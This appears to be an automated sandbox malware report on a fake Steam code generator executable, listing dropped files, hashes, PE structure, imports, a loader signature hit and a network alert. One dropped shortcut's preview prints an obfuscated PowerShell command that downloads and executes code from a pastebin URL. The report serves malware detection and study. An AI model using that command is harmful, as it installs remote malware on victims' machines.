                                                                                                                        Malicious:true
                                                                                                                        Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
                                                                                                                        Process:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):39510
                                                                                                                        Entropy (8bit):7.693386599727056
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:J8AiMUiDCHFlDY8E5X+2ewgdXC8pgpfcS7iKGztVuanh8w2OfJ:J8EUsCHFlDY3+2YBC8WJcS7i9u6ye
                                                                                                                        MD5:EBE145BD87E74B4BCA45E87525372F04
                                                                                                                        SHA1:EBE63CBA99F213980C7A94BACD580B347D740D4E
                                                                                                                        SHA-256:A53308B29B375BBE5140B8FC3781FE0E2F0F6F06A447C0F27AC9189F20B2F4B1
                                                                                                                        SHA-512:BFECFC20EAA3A62D58EDBFF2B5F69A75A382BFB58AFB3D3CB19FFEDC2A9E7AB3319BF714088B8586613419ECF4FCAC6C04CDA8AB75B0C86BF977F7164D05C463
                                                                                                                        Malicious:false
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stm[1].txt, Author: unknown
                                                                                                                        Preview:..e...e..0g.p.1.....>..E.$*...i..1..........YD(..h'@..b..-.S!.#hz..T2.X!;Ys.N.m0dyD;d9.x.....X..e..S.._..D&g*'ZG..z..)o.M.(C..@...8..H1........Sx[.^U.F.Ne8;IC....-..5Oua...|..x7T.m?H/~..~...9^.......q.u&.....U%=7..]..J.q.Ip.&{.4..[.......`..e......kx<....&..{..U.|..B.6jp)...!l.W{(].&(.y..1..-._.&.S.Nn.X..O..^2.L...%.XoYZ.....+t..z?.....l...+$.u.S./?...8..\7K.P=.m..Z.0..5.6...2]....Y.b.m.mG.Wn$A..Z.6.T._...?~H.U...+.(W]%...&.+..T.n..%..n.U...W.e&m...%..]...A^.).j;{<y.~..m-&........f...<.UP.x..o.dnI..$.p..!.{.rA...E.Yc.9..........................n..R]_..$.._.T.A*.......o.g.2...:/[.N..rx0..91h.3....g.`......zf..C.v.r....&......r.6`..G..L..2.FTb..o..HDKw.F.-.w.}..g).-B-zv......F...g.Q.#a.C.B.!.UZ.s-..S..._Q28KmR...2.NOu...b..'.C3w.b.Q...<..9Q.....`.....D..@x_...q.3.>.9^.bn.......Fc..[...8..f..%..ioT...O...4.5RW.......e.7.A@xz.6...8...u........g........@"..Mp.^....'.k........<...m.O.J.`.$.y...M&.r.Z...h.)!Hp.......>.$....G.X.|It2...8p._.3....
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):11608
                                                                                                                        Entropy (8bit):4.890472898059848
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                        MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                        SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                        SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                        SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                        Malicious:false
                                                                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):64
                                                                                                                        Entropy (8bit):1.1940658735648508
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:NlllulkL:NllUk
                                                                                                                        MD5:9EF5106A0944AFC70B2A333171E1FAEE
                                                                                                                        SHA1:F091748D14B5BE64341FE4FE6C37910B7515238A
                                                                                                                        SHA-256:F0696ACA49FCD3CD4A29C22CC3D93F1E5C146572C548391615752CC63803B164
                                                                                                                        SHA-512:67BC4DF2CC79A9E3DBDF9C0363F1C168808AFFAD2B9F5D4A053A679C42D0B7BCDF84D9DE90E67F32DF3AF92F3627D295E9C40DF52AA86014C1ACDE89036742D5
                                                                                                                        Malicious:false
                                                                                                                        Preview:@...e...............................[.k!.............@..........
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Users\user\Desktop\steamcodegenerator.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):46
                                                                                                                        Entropy (8bit):4.795088586397729
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:i9CLLWBBEACpctn:wCLUXCpctn
                                                                                                                        MD5:019EA55558F1B74BDF4831A0B951422F
                                                                                                                        SHA1:CC07CA8CBD26F22578BFA7E5325793787777E9D6
                                                                                                                        SHA-256:D4E64AC1F608C58B1650769A78B237DEA3A08401ECC86DE4B25F4B53ED185699
                                                                                                                        SHA-512:7FF442800DA2C7DFAA2D56A5D8DBE91E68B58A3441DD69D451676E43E4F936BFDDA073E5C07A048952D60E8B5938EDAF17D0DFAD38B29FC4611E51886A0480EC
                                                                                                                        Malicious:false
                                                                                                                        Preview:Generating.....Steam Code: UQNYA-GBGFP-LVE8U..
                                                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                        Entropy (8bit):6.2652516764461375
                                                                                                                        TrID:
                                                                                                                        • Win64 Executable Console (202006/5) 92.65%
                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:steamcodegenerator.exe
                                                                                                                        File size:258'048 bytes
                                                                                                                        MD5:d4f1751389516a3dfac98551142cb153
                                                                                                                        SHA1:f362178e1ecd3eac536b666e89c2aa5663109116
                                                                                                                        SHA256:eb727ad773925864801802b58b3060cfb1a0c18c1be78c8f9e6fc1d2840b19af
                                                                                                                        SHA512:d3e0e04c414c26c37894efe1cdd8adf1970ede58ffac510e17315f4599178706c5ce70d47796900e011f76444e3bb52238a542f60120a7a2a94d96c8ac3d4cab
                                                                                                                        SSDEEP:3072:IyEnMIVkwfjZrzYxopX5SfebFd+l1EkMmLmAvGaQNTxDwYPfMpOEM0UAP+Sg56:ILVDrZrzYapJQebFd+vFMmbTaThQ1UN
                                                                                                                        TLSH:DA447B5577A50CF8EC67827DCC514A0AE6B2BC160760EB9F03A08B5B5F236E09D3E761
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...j...i...l.1.i...m...i...i...i..lm...i..lj...i..ll...i...h...i...h...i..l`...i..l....i..lk...i.Rich..i........
                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                        Entrypoint:0x140009080
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x140000000
                                                                                                                        Subsystem:windows cui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x67093850 [Fri Oct 11 14:38:08 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:f63ec0d9e5630f984a80952b9a46676a
                                                                                                                        Instruction
                                                                                                                        dec eax
                                                                                                                        sub esp, 28h
                                                                                                                        call 00007F2EDCE7997Ch
                                                                                                                        dec eax
                                                                                                                        add esp, 28h
                                                                                                                        jmp 00007F2EDCE78FF7h
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        dec eax
                                                                                                                        sub esp, 28h
                                                                                                                        call 00007F2EDCE79CFCh
                                                                                                                        test eax, eax
                                                                                                                        je 00007F2EDCE791A3h
                                                                                                                        dec eax
                                                                                                                        mov eax, dword ptr [00000030h]
                                                                                                                        dec eax
                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                        jmp 00007F2EDCE79187h
                                                                                                                        dec eax
                                                                                                                        cmp ecx, eax
                                                                                                                        je 00007F2EDCE79196h
                                                                                                                        xor eax, eax
                                                                                                                        dec eax
                                                                                                                        cmpxchg dword ptr [00034698h], ecx
                                                                                                                        jne 00007F2EDCE79170h
                                                                                                                        xor al, al
                                                                                                                        dec eax
                                                                                                                        add esp, 28h
                                                                                                                        ret
                                                                                                                        mov al, 01h
                                                                                                                        jmp 00007F2EDCE79179h
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        dec eax
                                                                                                                        sub esp, 28h
                                                                                                                        test ecx, ecx
                                                                                                                        jne 00007F2EDCE79189h
                                                                                                                        mov byte ptr [00034681h], 00000001h
                                                                                                                        call 00007F2EDCE794D1h
                                                                                                                        call 00007F2EDCE7AEA4h
                                                                                                                        test al, al
                                                                                                                        jne 00007F2EDCE79186h
                                                                                                                        xor al, al
                                                                                                                        jmp 00007F2EDCE79196h
                                                                                                                        call 00007F2EDCE8818Bh
                                                                                                                        test al, al
                                                                                                                        jne 00007F2EDCE7918Bh
                                                                                                                        xor ecx, ecx
                                                                                                                        call 00007F2EDCE7AEB4h
                                                                                                                        jmp 00007F2EDCE7916Ch
                                                                                                                        mov al, 01h
                                                                                                                        dec eax
                                                                                                                        add esp, 28h
                                                                                                                        ret
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        inc eax
                                                                                                                        push ebx
                                                                                                                        dec eax
                                                                                                                        sub esp, 20h
                                                                                                                        cmp byte ptr [00034648h], 00000000h
                                                                                                                        mov ebx, ecx
                                                                                                                        jne 00007F2EDCE791E9h
                                                                                                                        cmp ecx, 01h
                                                                                                                        jnbe 00007F2EDCE791ECh
                                                                                                                        call 00007F2EDCE79C72h
                                                                                                                        test eax, eax
                                                                                                                        je 00007F2EDCE791AAh
                                                                                                                        test ebx, ebx
                                                                                                                        jne 00007F2EDCE791A6h
                                                                                                                        dec eax
                                                                                                                        lea ecx, dword ptr [00034632h]
                                                                                                                        call 00007F2EDCE87FAAh
                                                                                                                        test eax, eax
                                                                                                                        jne 00007F2EDCE79192h
                                                                                                                        dec eax
                                                                                                                        lea ecx, dword ptr [0003463Ah]
                                                                                                                        call 00007F2EDCE7919Ah
                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3a9340x3c.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x1e0.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3f0000x2460.pdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x440000x9a4.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x364600x70.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x363200x140.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x2e8.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x29f400x2a0002ad535e4366959067e2e60d8aafa7658False0.5462646484375data6.492900443589932IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x2b0000x102ee0x10400f45884d9dba838b4f775fb0b6ef92b79False0.42321213942307695data4.8807783288878275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x3c0000x2a500x14003c0e81b51e51780698ebe5ffc0a838deFalse0.162890625DOS executable (block device driver)2.705660946828352IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .pdata0x3f0000x24600x2600641900e4b17ed72e996a7af8fcf39302False0.46895559210526316data5.255275322700397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        _RDATA0x420000x1f40x200093bc688e5029835ff2195256ddf5afdFalse0.494140625data3.6328021103092234IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x430000x1e00x2009866eeb93e80b773405f3d7936b83641False0.52734375data4.7074344725994175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x440000x9a40xa006e22f657667f6504de5a7699c3e54392False0.496875data5.389301065625464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_MANIFEST0x430600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllVirtualFree, VirtualAlloc, MultiByteToWideChar, Sleep, GetLastError, WriteConsoleW, CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, RtlUnwind
                                                                                                                        WININET.dllInternetOpenW, InternetOpenUrlW, InternetCloseHandle, InternetReadFile
                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2024-10-15T15:52:55.501300+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.649898162.159.138.232443TCP
